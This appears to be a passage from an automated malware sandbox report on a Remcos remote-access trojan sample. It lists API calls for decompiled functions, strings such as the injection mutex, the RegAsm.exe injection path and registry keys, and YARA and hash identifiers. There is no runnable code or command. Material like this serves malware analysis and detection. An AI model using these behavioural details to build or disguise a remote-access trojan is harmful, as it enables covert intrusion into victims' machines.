                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                  • wcslen.MSVCRT ref: 004090DB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                    • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                    • Part of subcall function 00407E37: CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                    • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                    • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                    • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                    • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                    • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                  • wcscpy.MSVCRT ref: 00409230
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                  • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                  • atoi.MSVCRT ref: 00409391
                                  • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                  • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                  • atoi.MSVCRT ref: 00409540
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                    • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                    • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                    • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                    • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                    • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                    • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                    • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                    • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                    • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                    • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1420703245
                                  • Opcode ID: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C81C, Relevance: 251.0, APIs: 135, Strings: 8, Instructions: 764sleepnetworkthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                  • atoi.MSVCRT ref: 0040C85C
                                  • Sleep.KERNEL32(00000000), ref: 0040C870
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
